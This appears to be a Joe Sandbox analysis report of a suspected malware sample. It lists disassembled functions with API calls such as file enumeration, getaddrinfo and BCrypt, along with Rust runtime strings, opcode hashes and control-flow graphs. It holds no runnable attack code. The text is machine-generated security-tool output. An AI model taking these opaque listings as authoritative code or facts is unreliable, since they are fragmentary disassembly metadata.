                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$FilePointermemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 1254189466-0
                                                                                          • Opcode ID: 72c311c7728702ac5f9d36a822a949a999c05eab67618c1db727c6fcac7a1f4e
                                                                                          • Instruction ID: 817ec8a62c83be829e802a7cbe5a775d44edcd3a8bb797a60f7a7bf05fd952a8
                                                                                          • Opcode Fuzzy Hash: 72c311c7728702ac5f9d36a822a949a999c05eab67618c1db727c6fcac7a1f4e
                                                                                          • Instruction Fuzzy Hash: 8502D262B09B81C0EE25AF15E400369E3A1FF89B94F8491B5DE8D17B85FE3CE9408718
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768DBEAB3 Relevance: 4.1, APIs: 3, Instructions: 326memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeapmemcpymemset
                                                                                          • String ID:
                                                                                          • API String ID: 2272576838-0
                                                                                          • Opcode ID: 1599b3361ada321ea0890bb47f56544e37affcf6ab14b153db10d01087d156c7
                                                                                          • Instruction ID: df4fe57ba61c687127a08ab2062c23434affae6127b4fa0caa09a344f919a688
                                                                                          • Opcode Fuzzy Hash: 1599b3361ada321ea0890bb47f56544e37affcf6ab14b153db10d01087d156c7
                                                                                          • Instruction Fuzzy Hash: D8C13862B18BC596DA10AF299405279E751EF99BE4F888734DEAE077C4DF3CD049C328
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768BCFD61 Relevance: 3.1, Strings: 2, Instructions: 561COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: header map at capacity$requested capacity too large
                                                                                          • API String ID: 0-1945430686
                                                                                          • Opcode ID: 92627a8b014604ecc6f67d04b1fe121a83148443f88e2a4d894e6806ab02faf7
                                                                                          • Instruction ID: 6edade47f620b88d6af724928acc5d2080879522ffa8e557ab2fcc2a696e248c
                                                                                          • Opcode Fuzzy Hash: 92627a8b014604ecc6f67d04b1fe121a83148443f88e2a4d894e6806ab02faf7
                                                                                          • Instruction Fuzzy Hash: B022C267A09B85D1EA61AF19E4403A9E3A0FF48BC4F844132EE8D43795EF7CE496C714
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768DA3170 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memset.VCRUNTIME140(?,?,?,?,00007FF768DA2FDE,?,?,00000004,00007FF768D02A41), ref: 00007FF768DA3181
                                                                                          • GetSystemInfo.KERNELBASE(?,?,?,?,00007FF768DA2FDE,?,?,00000004,00007FF768D02A41), ref: 00007FF768DA318D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoSystemmemset
                                                                                          • String ID:
                                                                                          • API String ID: 3558857096-0
                                                                                          • Opcode ID: b48e0b70219c7850f9dbabe6f2dd136eac229a4f46f3662b6edb0d299b64825a
                                                                                          • Instruction ID: 4f6b13fd7d3802d3887f0f8449b6b90e1b694b7ef29a235a847c3a32fa9a371b
                                                                                          • Opcode Fuzzy Hash: b48e0b70219c7850f9dbabe6f2dd136eac229a4f46f3662b6edb0d299b64825a
                                                                                          • Instruction Fuzzy Hash: 8F01F679E28443D9F744FB24EC550B8E3A2FF94700FC44072E10E421A6DE7CA589C328
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C7C0A0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • BCryptGenRandom.BCRYPT(?,?,?,?,?,?,00007FF768C7E79E,?,?,?,?,00007FF768C7E55B,?,?,?,00000000), ref: 00007FF768C7C0DC
                                                                                            • Part of subcall function 00007FF768C75B40: BCryptOpenAlgorithmProvider.BCRYPT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF768C7C0F9), ref: 00007FF768C75B6F
                                                                                            • Part of subcall function 00007FF768C75B40: BCryptGenRandom.BCRYPT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF768C7C0F9), ref: 00007FF768C75BBB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Crypt$Random$AlgorithmOpenProvider
                                                                                          • String ID:
                                                                                          • API String ID: 3620028385-0
                                                                                          • Opcode ID: 7e21064a4d7db2d9ad5461f9bb34933da67993814382e5b8f90cf5f5223dbc7b
                                                                                          • Instruction ID: 381a115e552132b66161455e715b535244afce21dca2c3a5c99fb9de19da6a62
                                                                                          • Opcode Fuzzy Hash: 7e21064a4d7db2d9ad5461f9bb34933da67993814382e5b8f90cf5f5223dbc7b
                                                                                          • Instruction Fuzzy Hash: F4018B71A09B82C0EA249B1AE0443A9E3A4FF48B88FA04136DE8D17760CF3ED186C714
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B8E216 Relevance: 1.3, APIs: 1, Instructions: 32COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF768B8E58C), ref: 00007FF768B8E270
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 1452528299-0
                                                                                          • Opcode ID: 4c64057af053c6d58e5aafc01ff5f5db3793b5186ff57e25b9aa54ba6cf6483d
                                                                                          • Instruction ID: 0e9f14e3de2933d9c9f563b8a7bc13522ddb2110a836fe6fc67ca25f3f79be90
                                                                                          • Opcode Fuzzy Hash: 4c64057af053c6d58e5aafc01ff5f5db3793b5186ff57e25b9aa54ba6cf6483d
                                                                                          • Instruction Fuzzy Hash: A50112B2609B81CBD760DF68F44066EF6E4EB89740B648134EBCD87B44EB78D4A1CB14
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768D805D0 Relevance: 25.9, APIs: 13, Strings: 4, Instructions: 432stringCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 11644 7ff768d805d0-7ff768d80643 11645 7ff768d80649-7ff768d8064f 11644->11645 11646 7ff768d806e8-7ff768d80700 11644->11646 11645->11646 11649 7ff768d80655-7ff768d80658 11645->11649 11647 7ff768d80689-7ff768d806cb call 7ff768d7f0a0 11646->11647 11648 7ff768d80702-7ff768d80708 11646->11648 11657 7ff768d807ee-7ff768d8085e memcpy 11647->11657 11658 7ff768d806d1-7ff768d806d4 11647->11658 11648->11647 11651 7ff768d8070e-7ff768d80724 call 7ff768d7efe8 11648->11651 11649->11648 11652 7ff768d8065e-7ff768d8066e call 7ff768d64c44 11649->11652 11660 7ff768d806de-7ff768d806e3 11651->11660 11665 7ff768d80726-7ff768d80743 11651->11665 11652->11660 11661 7ff768d80670-7ff768d80686 strlen 11652->11661 11663 7ff768d80909-7ff768d80923 11657->11663 11664 7ff768d80864-7ff768d80882 memcpy 11657->11664 11658->11660 11662 7ff768d806d6-7ff768d806d9 call 7ff768d028e0 11658->11662 11669 7ff768d80c0f-7ff768d80c1f 11660->11669 11661->11647 11662->11660 11666 7ff768d80925-7ff768d80928 11663->11666 11667 7ff768d80932-7ff768d80949 11663->11667 11670 7ff768d80899 11664->11670 11671 7ff768d80884-7ff768d80897 memcpy 11664->11671 11677 7ff768d80757-7ff768d80789 strlen * 2 11665->11677 11678 7ff768d80745-7ff768d80751 11665->11678 11666->11667 11674 7ff768d8092a-7ff768d8092d call 7ff768d028e0 11666->11674 11675 7ff768d80a40-7ff768d80a5b 11667->11675 11676 7ff768d8094f-7ff768d80952 11667->11676 11672 7ff768d8089c-7ff768d80907 memcpy * 4 11670->11672 11671->11672 11672->11666 11674->11667 11681 7ff768d80a5f-7ff768d80a61 11675->11681 11676->11675 11680 7ff768d80958-7ff768d80979 11676->11680 11682 7ff768d8078b-7ff768d807ae strlen * 2 11677->11682 11683 7ff768d807b4-7ff768d807bc 11677->11683 11678->11677 11691 7ff768d80985-7ff768d809a4 11680->11691 11684 7ff768d80bdb-7ff768d80be9 11681->11684 11685 7ff768d80a67-7ff768d80a73 call 7ff768d81024 11681->11685 11682->11682 11688 7ff768d807b0 11682->11688 11689 7ff768d807be-7ff768d807cc 11683->11689 11690 7ff768d807e6-7ff768d807e9 11683->11690 11686 7ff768d80beb-7ff768d80bf4 11684->11686 11687 7ff768d80bf8-7ff768d80c04 call 7ff768d4ea9c 11684->11687 11698 7ff768d80a78-7ff768d80a7c 11685->11698 11686->11687 11697 7ff768d80c08-7ff768d80c0d call 7ff768d028e0 11687->11697 11688->11683 11689->11647 11694 7ff768d807d2-7ff768d807e0 call 7ff768d61034 11689->11694 11690->11697 11695 7ff768d80b9a-7ff768d80b9d 11691->11695 11696 7ff768d809aa-7ff768d809b8 11691->11696 11694->11647 11694->11690 11695->11681 11704 7ff768d809be-7ff768d809c8 11696->11704 11705 7ff768d809ba-7ff768d809bc 11696->11705 11697->11669 11698->11684 11699 7ff768d80a82-7ff768d80af5 memset call 7ff768d8220c 11698->11699 11699->11684 11715 7ff768d80afb-7ff768d80b49 11699->11715 11709 7ff768d809ca-7ff768d809d3 11704->11709 11705->11709 11710 7ff768d809f6-7ff768d80a16 call 7ff768d036ac 11709->11710 11711 7ff768d809d5-7ff768d809ea call 7ff768d59610 11709->11711 11723 7ff768d80a3a 11710->11723 11724 7ff768d80a18-7ff768d80a34 call 7ff768d036ac 11710->11724 11711->11710 11721 7ff768d809ec-7ff768d809f3 11711->11721 11718 7ff768d80b6b-7ff768d80b8e call 7ff768d59610 11715->11718 11719 7ff768d80b4b-7ff768d80b67 11715->11719 11727 7ff768d80ba2-7ff768d80ba5 11718->11727 11728 7ff768d80b90-7ff768d80b98 11718->11728 11719->11718 11721->11710 11723->11675 11724->11695 11724->11723 11731 7ff768d80bac-7ff768d80bb0 11727->11731 11732 7ff768d80ba7-7ff768d80baa 11727->11732 11730 7ff768d80bb4-7ff768d80bd9 call 7ff768d594b0 11728->11730 11730->11669 11731->11730 11732->11730 11732->11731
                                                                                          APIs
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,00000000), ref: 00007FF768D80673
                                                                                            • Part of subcall function 00007FF768D7F0A0: memset.VCRUNTIME140(?,?,00000002,00007FF768D5D79C,00000000,?,?,00007FF768D082D9,?,?,?,00007FF768DA3D81), ref: 00007FF768D7F0C2
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,00000000), ref: 00007FF768D8075A
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,00000000), ref: 00007FF768D8076E
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,00000000), ref: 00007FF768D8078E
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,00000000), ref: 00007FF768D8079D
                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,00000000,00000000), ref: 00007FF768D80845
                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,00000000,00000000), ref: 00007FF768D8086D
                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,00000000,00000000), ref: 00007FF768D8088E
                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,00000000,00000000), ref: 00007FF768D808B1
                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,00000000,00000000), ref: 00007FF768D808CC
                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,00000000,00000000), ref: 00007FF768D808EA
                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,00000000,00000000), ref: 00007FF768D80902
                                                                                          • memset.VCRUNTIME140(?,?,?,?,00000000,00000000), ref: 00007FF768D80AA2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memcpy$strlen$memset
                                                                                          • String ID: -journal$-wal$immutable$nolock
                                                                                          • API String ID: 473432538-3408036318
                                                                                          • Opcode ID: b39165ca7592d439312818ad32ebe60e6a560bc5eefca75a54a165fa42751b4a
                                                                                          • Instruction ID: f02f9e568a8a0f04928a192df4ed2ae6aae3177b6aef3d1fb112dc58b18ea210
                                                                                          • Opcode Fuzzy Hash: b39165ca7592d439312818ad32ebe60e6a560bc5eefca75a54a165fa42751b4a
                                                                                          • Instruction Fuzzy Hash: 3F129BB2B05B95CAEB10EB66D8802ACABA0FF49BD8F484135DE0D17B95DF38D444C764
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C64E70 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 133fileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 15657 7ff768c64e70-7ff768c64ea2 15658 7ff768c64ecd-7ff768c64ef6 memset FindNextFileW 15657->15658 15659 7ff768c64ea4-7ff768c64eac 15657->15659 15662 7ff768c64efc-7ff768c64f0f 15658->15662 15663 7ff768c64fb4-7ff768c64fbc GetLastError 15658->15663 15660 7ff768c64fce-7ff768c64fd2 15659->15660 15661 7ff768c64eb2-7ff768c64eb6 15659->15661 15664 7ff768c64fd8-7ff768c64ff4 15660->15664 15665 7ff768c650b9-7ff768c650bf 15660->15665 15661->15658 15666 7ff768c64eb8-7ff768c64ebd 15661->15666 15667 7ff768c64f30-7ff768c64f39 15662->15667 15668 7ff768c65045-7ff768c65054 GetLastError 15663->15668 15669 7ff768c64fc2-7ff768c64fc9 15663->15669 15671 7ff768c64ff9-7ff768c65043 memcpy * 2 15664->15671 15666->15660 15672 7ff768c64ec3-7ff768c64ec7 15666->15672 15674 7ff768c64f3b-7ff768c64f46 15667->15674 15675 7ff768c64f59-7ff768c64f5d 15667->15675 15673 7ff768c65057-7ff768c650a0 memcpy 15668->15673 15670 7ff768c650a7-7ff768c650b8 15669->15670 15671->15673 15672->15658 15672->15660 15673->15670 15676 7ff768c64f48-7ff768c64f4c 15674->15676 15677 7ff768c64f20-7ff768c64f2a FindNextFileW 15674->15677 15675->15665 15678 7ff768c64f63-7ff768c64fb2 15675->15678 15676->15675 15679 7ff768c64f4e-7ff768c64f57 15676->15679 15677->15663 15677->15667 15678->15671 15679->15675 15679->15677
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memcpy$ErrorFileFindLastNextmemset
                                                                                          • String ID: .
                                                                                          • API String ID: 1879595650-248832578
                                                                                          • Opcode ID: 26e17409e00eb38781fbc63b96a1d167d319d5467073a59ac145945c2cc5ff0f
                                                                                          • Instruction ID: 7dcad6964ebe0b05610e6eb3541fc1b2f3287da3f5d6a56a8081655fa04d7fcc
                                                                                          • Opcode Fuzzy Hash: 26e17409e00eb38781fbc63b96a1d167d319d5467073a59ac145945c2cc5ff0f
                                                                                          • Instruction Fuzzy Hash: 8151AE62A086C1C2E7759B25E0417BAF3A0FF94784F409131EF8812685EF3CE0D6CB25
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C6B140 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 236networkCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 15822 7ff768c6b140-7ff768c6b164 15823 7ff768c6b16a-7ff768c6b171 15822->15823 15824 7ff768c6b268 call 7ff768dbde60 15822->15824 15825 7ff768c6b27a-7ff768dbdee7 15823->15825 15826 7ff768c6b177-7ff768c6b194 memcpy 15823->15826 15830 7ff768c6b26d-7ff768c6b274 15824->15830 15834 7ff768dbe042-7ff768dbe05a call 7ff768dba1e0 15825->15834 15835 7ff768dbdeed 15825->15835 15828 7ff768c6b1b9-7ff768c6b1c8 call 7ff768bbbdf0 15826->15828 15829 7ff768c6b196-7ff768c6b19e 15826->15829 15843 7ff768c6b1ca 15828->15843 15844 7ff768c6b1d6-7ff768c6b1d9 15828->15844 15832 7ff768c6b1a0-7ff768c6b1a5 15829->15832 15830->15825 15830->15826 15836 7ff768c6b1cc-7ff768c6b1d4 15832->15836 15837 7ff768c6b1a7-7ff768c6b1ad 15832->15837 15840 7ff768dbe05c-7ff768dbe061 call 7ff768bb0250 15834->15840 15839 7ff768dbdef3-7ff768dbdf0f call 7ff768bad0e0 15835->15839 15835->15840 15836->15844 15847 7ff768c6b232-7ff768c6b244 15836->15847 15837->15832 15842 7ff768c6b1af-7ff768c6b1b5 15837->15842 15854 7ff768dbdf15-7ff768dbdf46 memcpy call 7ff768bbbdf0 15839->15854 15855 7ff768dbe063-7ff768dbe09e call 7ff768db9d40 15839->15855 15840->15855 15842->15844 15849 7ff768c6b1b7 15842->15849 15843->15847 15844->15847 15851 7ff768c6b1db-7ff768c6b217 getaddrinfo 15844->15851 15853 7ff768c6b25c-7ff768c6b267 15847->15853 15849->15847 15856 7ff768c6b219-7ff768c6b230 WSAGetLastError 15851->15856 15857 7ff768c6b246-7ff768c6b257 15851->15857 15865 7ff768dbdf89-7ff768dbdfdf call 7ff768bb0390 getaddrinfo 15854->15865 15866 7ff768dbdf48-7ff768dbdf5f 15854->15866 15863 7ff768dbe0a0-7ff768dbe0a4 call 7ff768bb0540 15855->15863 15864 7ff768dbe0a9-7ff768dbe0b8 15855->15864 15858 7ff768c6b259 15856->15858 15857->15858 15858->15853 15863->15864 15872 7ff768dbdfe1-7ff768dbdff9 WSAGetLastError 15865->15872 15873 7ff768dbdffb-7ff768dbe00f 15865->15873 15869 7ff768dbe02f-7ff768dbe041 15866->15869 15870 7ff768dbdf65-7ff768dbdf82 HeapFree 15866->15870 15870->15865 15874 7ff768dbe011-7ff768dbe01b 15872->15874 15873->15874 15874->15869 15875 7ff768dbe01d-7ff768dbe029 HeapFree 15874->15875 15875->15869
                                                                                          APIs
                                                                                          Strings
                                                                                          • called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 00007FF768DBE042
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memcpy$ErrorLastgetaddrinfo
                                                                                          • String ID: called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
                                                                                          • API String ID: 2267356757-1586615424
                                                                                          • Opcode ID: fb110bf8c498bec3fcf1d0e8796246965c4f06c2808afcd66e131c589983faa6
                                                                                          • Instruction ID: 8258c931bb5e89f5ca66e49f8665fcd6072804e45addd03bd2633e011e1c6a22
                                                                                          • Opcode Fuzzy Hash: fb110bf8c498bec3fcf1d0e8796246965c4f06c2808afcd66e131c589983faa6
                                                                                          • Instruction Fuzzy Hash: D791B162A09681D4F751AB61E8447FDE7A4BF487A4F884035EE4C16794EF3CE1C6C368
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768DBD330 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 330COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: already borrowed$assertion failed: state_and_queue.addr() & STATE_MASK == RUNNINGOnce instance has previously been poisoned$failed to write whole buffer$use of std::thread::current() is not possible after the thread's local data has been destroyed
                                                                                          • API String ID: 0-2359635509
                                                                                          • Opcode ID: b6cd2f51c03f25e7282e7ab357e655aa57029ff656e2b1ea0bfcb0c8ce0ab604
                                                                                          • Instruction ID: caad24d5a199c0ed1926c3e9421d1eae8da6f152d98b6f9a5dc36f661f20995e
                                                                                          • Opcode Fuzzy Hash: b6cd2f51c03f25e7282e7ab357e655aa57029ff656e2b1ea0bfcb0c8ce0ab604
                                                                                          • Instruction Fuzzy Hash: B1F14B76A05A46D4EB50EF25D8807B9B7A0FF48B68F844232ED1D837A5DF38E449C364
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B78154 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 263memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$AcquireExclusiveLock
                                                                                          • String ID: stderrlibrary\std\src\io\mod.rs
                                                                                          • API String ID: 2371024757-899432943
                                                                                          • Opcode ID: 6e9fac38140f697866febb4755943781324a33d2617ada5858e65a4314a44033
                                                                                          • Instruction ID: 4efc66ef437ee67c2dc0abc28366cfadb675291231d1e330f7f966861161084f
                                                                                          • Opcode Fuzzy Hash: 6e9fac38140f697866febb4755943781324a33d2617ada5858e65a4314a44033
                                                                                          • Instruction Fuzzy Hash: 4CC19072A45B81C5EB11AF29E8403A8B3A4FF48798F844536EE4C077A5DF38E596C358
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768BA8E3D Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 290memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
